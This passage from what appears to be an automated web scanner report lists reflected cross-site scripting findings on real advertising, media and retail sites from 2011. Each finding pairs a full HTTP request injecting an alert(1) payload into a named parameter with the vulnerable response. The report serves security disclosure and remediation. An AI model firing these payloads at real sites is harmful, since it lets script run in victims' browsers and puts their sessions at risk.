GET /admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match95a30'%3balert(1)//7d4e8305cf HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; subID="{}"; impressions="{\"580192\": [1308590348+ \"162762637887060014\"+ 29710+ 11561+ 12332]}"; camp_freq_p1="eJzjkuH4vZBVgFGip+nfexYFRo2epc0fWAwYLcB8AJyQC1E="; exchange_uid="eyIyIjogWyI3MjEyMjgyNzE3ODA4MzkwMjAwIiwgNzM0MzIxXSwgIjQiOiBbIkUwIiwgNzM0MzA4XX0="; io_freq_p1="eJzjEua4ECrAKNHT9O89iwGjBZgGAEeuB9s="; segments_p1="eJzjYuFYs4uJi5ljcSKQ+McBJKYqAYnnuVycHPejBY40HfvIwsXCMesQMwDhcQvD"; partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXSwgIjE5OSI6IFsiNUY0MTJDQzZCQTA4RkQ2N0FBNENDNzVBMDA1N0RBMjUiLCB0cnVlXSwgIjE5MSI6IFsiNzM1MjgyMTM0NDMwMDgwMTA4MSIsIHRydWVdLCAiMTUiOiBbIjAwMzAwMTAwMTk4MDAwMDg4NTg1OSIsIHRydWVdfQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 19-Jul-2011 20:42:46 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 284

document.write('<img width="0" height="0" src="http://tag.admeld.com/match95a30';alert(1)//7d4e8305cf?admeld_adprovider_id=300&external_user_id=2ecd6c1e-5306-444b-942d-9108b17fd086&Expiration=1311540186&custom_user_segments=%2C12451%2C14055%2C40236%2C4373%2C57626%2C1150%2C11743"/>
...[SNIP]...

4.113. http://r.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 119bc"><script>alert(1)</script>62e3c2f614 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=119bc"><script>alert(1)</script>62e3c2f614&sp=y&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:06 GMT
Content-Length: 383

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=2415557707156706131&fpid=119bc"><script>alert(1)</script>62e3c2f614&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.114. http://r.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe90d"><script>alert(1)</script>7ca5f466ef2 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=fe90d"><script>alert(1)</script>7ca5f466ef2&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:07 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=4472778436510522482&fpid=4&nu=n&t=&sp=fe90d"><script>alert(1)</script>7ca5f466ef2&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.115. http://rd.rlcdn.com/rd [var parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /rd

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8523f%3balert(1)//7a5f5e8a821 was submitted in the var parameter. This input was echoed as 8523f;alert(1)//7a5f5e8a821 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rd?site=42664&type=js&var=s_1_Integrate_Rapleaf_get_08523f%3balert(1)//7a5f5e8a821&rnd=6123389569118 HTTP/1.1
Host: rd.rlcdn.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:02:48 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Cache-Control: no-cache, no-store
Content-Length: 63

var s_1_Integrate_Rapleaf_get_08523f;alert(1)//7a5f5e8a821={};

4.116. http://realnetworks.com/workarea/csslib/ektronCss.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 2a8d7<script>alert(1)</script>0ec91912e3 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronThickBoxCss+EktronBubbleCss+EktronModalCss2a8d7<script>alert(1)</script>0ec91912e3 HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:10:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:10:46 GMT
Last-Modified: Tue, 19 Jul 2011 20:10:46 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 6917

#Ekt_AjaxContent{padding:0;margin:0;}#EkTB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#EkTB_window a:link{color:#666;}#EkTB_window a:visited{color:#666;}#EkTB_window a:hover{color:#00
...[SNIP]...
l('/WorkArea/images/application/bubble/bott.gif');}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronModalCss2a8d7<script>alert(1)</script>0ec91912e3 */
/* path:
/* ############################################################# */


4.117. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 9f3a8<script>alert(1)</script>a29b388671c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS9f3a8<script>alert(1)</script>a29b388671c HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:10:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:10:47 GMT
Last-Modified: Tue, 19 Jul 2011 20:10:47 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJS9f3a8<script>alert(1)</script>a29b388671c
//path:
//################################################################


4.118. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload 941d1%0aalert(1)//da580d2ce44 was submitted in the id parameter. This input was echoed as 941d1
alert(1)//da580d2ce44
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workarea/java/ektronJs.ashx?id=EktronSmartMenuJS+EktronWebToolBarJS+EktronFlexMenuJS941d1%0aalert(1)//da580d2ce44 HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/pressroom/index.aspx
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx; __qca=P0-1586148760-1311106896347; __utma=93573022.528241780.1311106897.1311106897.1311106897.1; __utmb=93573022.1.10.1311106897; __utmc=93573022; __utmz=93573022.1311106897.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:12:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:12:26 GMT
Last-Modified: Tue, 19 Jul 2011 20:12:26 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 55177

function ekMenuEx_classNames(){}ekMenuEx_classNames.button="ekmenu_button";ekMenuEx_classNames.buttonHover="ekmenu_button_hover";ekMenuEx_classNames.buttonSelected="ekmenu_button_selected";ekMenuEx_cl
...[SNIP]...
n().ready(function(){Ektron.EditorsMenu.bindEvents()})};

//################################################################
//ektron registered javascript: js file not found
//id: EktronFlexMenuJS941d1
alert(1)//da580d2ce44

//path:
//################################################################


4.119. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://realnetworksrealarca.tt.omtrdc.net
Path:   /m2/realnetworksrealarca/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 8b543<script>alert(1)</script>de66053e04b was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=1&mbox=gh-global8b543<script>alert(1)</script>de66053e04b&mboxId=0&mboxTime=1311089154536&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:26:37 GMT; Path=/m2/realnetworksrealarca
Content-Type: text/javascript
Content-Length: 131
Date: Tue, 19 Jul 2011 20:26:37 GMT
Server: Test & Target

mboxFactories.get('default').get('gh-global8b543<script>alert(1)</script>de66053e04b',0).setOffer(new mboxOfferDefault()).loaded();

4.120. http://rover.ebay.com/idmap/0 [footer&cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /idmap/0

Issue detail

The value of the footer&cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8638b%3balert(1)//c4974089122 was submitted in the footer&cb parameter. This input was echoed as 8638b;alert(1)//c4974089122 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idmap/0?footer&cb=vjo.dsf.assembly.VjClientAssembler._callback18638b%3balert(1)//c4974089122&_vrdm=1311100564001 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.d63ed1c-13143afa25f
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/json
Date: Tue, 19 Jul 2011 18:36:49 GMT
Content-Length: 103

try{vjo.dsf.assembly.VjClientAssembler._callback18638b;alert(1)//c4974089122(["","",86400]);}catch(e){}

4.121. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 94f58%0a05b7ac25fb8 was submitted in the site parameter. This input was echoed as 94f58
05b7ac25fb8
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=2166117494f58%0a05b7ac25fb8&d_id=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:19:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCDCRCQR=MKNALKKDOIHBFKFFJGNMAODJ; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2166117494f58
05b7ac25fb8

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

4.122. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.boston.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload c1850<script>alert(1)</script>7319e07e022 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22b12c8144-b20e-11e0-aa83-a59fd6e1b552%22%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0c1850<script>alert(1)</script>7319e07e022 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=8; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 879
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Tue, 19 Jul 2011 20:44:54 GMT

RequestBatch.callbacks.daapiCallback0c1850<script>alert(1)</script>7319e07e022({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/19/2011 04:42:04:603 PM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"b12c8144-b20e-11e0-aa83-a59fd6e1b552"},"Section":null,"Categori
...[SNIP]...

4.123. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://stubhub.tt.omtrdc.net
Path:   /m2/stubhub/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 17d1a<script>alert(1)</script>f9a0e7c0a1a was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/stubhub/mbox/standard?mboxHost=www.stubhub.com&mboxSession=1311100546147-926694&mboxPC=1308447436655-203098.17&mboxPage=1311100546147-926694&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxCount=2&mbox=TicketDetails_Pricing17d1a<script>alert(1)</script>f9a0e7c0a1a&mboxId=0&mboxTime=1311082548475&mboxURL=http%3A%2F%2Fwww.stubhub.com%2F%3Fticket_id%3D303237644%26GCID%3DC12289x970%26quantity_selected%3D2%26gtkw%3D-640518298&mboxReferrer=http%3A%2F%2Fbing.fansnap.com%2Fcheckout%2Findex%2F418563179%3Fctx%3Dc%253Dtix%253Bmt%253Dint%253Btsp%253D0%253Bdt%253D1%253Blpos%253D2%26ch%3Dbing%26quantity%3D2%26lp%3Dtrue%26poctx%3Drank%253D36%253BcrawlScore%253Dnull%253Bpop1%253D0.0374%253Bpop2%253D0.0374%253Bpop3%253D0.0374%253B%26afm%3D%26uet%3D-776896836%253A7925%253Apgstickets%257C%257Cbing%257Cmt%253Aint%253Bsz%253A1254%253Bid%253A389669&mboxVersion=40 HTTP/1.1
Host: stubhub.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 143
Date: Tue, 19 Jul 2011 18:39:17 GMT
Server: Test & Target

mboxFactories.get('default').get('TicketDetails_Pricing17d1a<script>alert(1)</script>f9a0e7c0a1a',0).setOffer(new mboxOfferDefault()).loaded();

4.124. http://support.fastteks.com/contact-us.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.fastteks.com
Path:   /contact-us.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5afa"><script>alert(1)</script>c2243c61dfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5afa\"><script>alert(1)</script>c2243c61dfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact-us.php?d5afa"><script>alert(1)</script>c2243c61dfa=1 HTTP/1.1
Host: support.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/Contact-Us.aspx?id=443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.2.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:01:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8j DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
X-Powered-By: PHP/4.4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-
...[SNIP]...
